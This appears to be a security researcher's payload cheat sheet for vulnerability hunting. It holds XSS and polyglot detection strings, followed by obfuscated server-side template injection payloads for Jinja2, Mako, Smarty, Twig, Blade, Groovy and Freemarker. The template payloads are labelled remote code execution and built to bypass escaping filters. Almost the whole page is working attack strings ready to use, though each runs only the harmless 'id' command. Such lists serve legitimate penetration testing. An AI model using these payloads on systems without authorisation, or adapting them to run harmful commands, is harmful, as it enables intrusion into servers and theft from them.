Payloads

A list of payloads that I use when hunting for vulnerabilities. Personally, I rarely use exploitation payloads but instead detection payloads.

All payloads shown on this page are created by me. I provide a basic overview of my payloads; exploitation payloads and more advanced detection payloads will not be shared.

Polyglot payloads

This payload focuses on the detection of syntax errors.

<z>"z'z`%}})z${{z\

This payload focuses on detecting transformations that can be used in future attacks.

tfmtstart%255Az%5Az\x5Az\u005Az%26%23x5A%3Btfmtend

Cool payloads

This core payload was discovered by the amazing researcher garethheyes! You can read more about his research on it here.

I made a few adjustments to it:

<script>'<!--<script>'</script>//alert(1)</script>

The Fake comment XSS

/\///alert(1)

Server Side Template Injection (SSTI)

Double template rendering payloads

Some of the indexes used in these payloads to extract characters from strings may need to be adjusted depending on the application under test.

These payloads can be used to bypass autoescape / HTML escape filters.

Jinja2

Impact: Remote Code Execution (RCE)

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[150:152]+self.__init__.__globals__.__str__()[694]).read()}}

Mako

Impact: Remote Code Execution (RCE)

${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()}

Smarty

Impact: Remote Code Execution (RCE)

{{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}}

Twig

Impact: Remote Code Execution (RCE)

{{id~passthru~_context|join|slice(2,2)|split(000)|map(_context|join|slice(5,8))}}
{%block U%}id000passthru{%endblock%}{%set x=block(_charset|first)|split(000)%}{{[x|first]|map(x|last)|join}}

Blade

Impact: Remote Code Execution (RCE)

{{passthru(implode(Null,array_map(chr(99).chr(104).chr(114),[105,100])))}}

Groovy

Impact: Remote Code Execution (RCE)

${x=new String();for(i in[105,100]){x+=((char)i).toString()};x.execute().text}

Freemarker

Impact: Remote Code Execution (RCE)

${(6?lower_abc+18?lower_abc+5?lower_abc+5?lower_abc+13?lower_abc+1?lower_abc+18?lower_abc+11?lower_abc+5?lower_abc+18?lower_abc+1.1?c[1]+20?lower_abc+5?lower_abc+13?lower_abc+16?lower_abc+12?lower_abc+1?lower_abc+20?lower_abc+5?lower_abc+1.1?c[1]+21?lower_abc+20?lower_abc+9?lower_abc+12?lower_abc+9?lower_abc+20?lower_abc+25?lower_abc+1.1?c[1]+5?upper_abc+24?lower_abc+5?lower_abc+3?lower_abc+21?lower_abc+20?lower_abc+5?lower_abc)?new()(9?lower_abc+4?lower_abc)}

You can find a lot of great resources related to payloads below.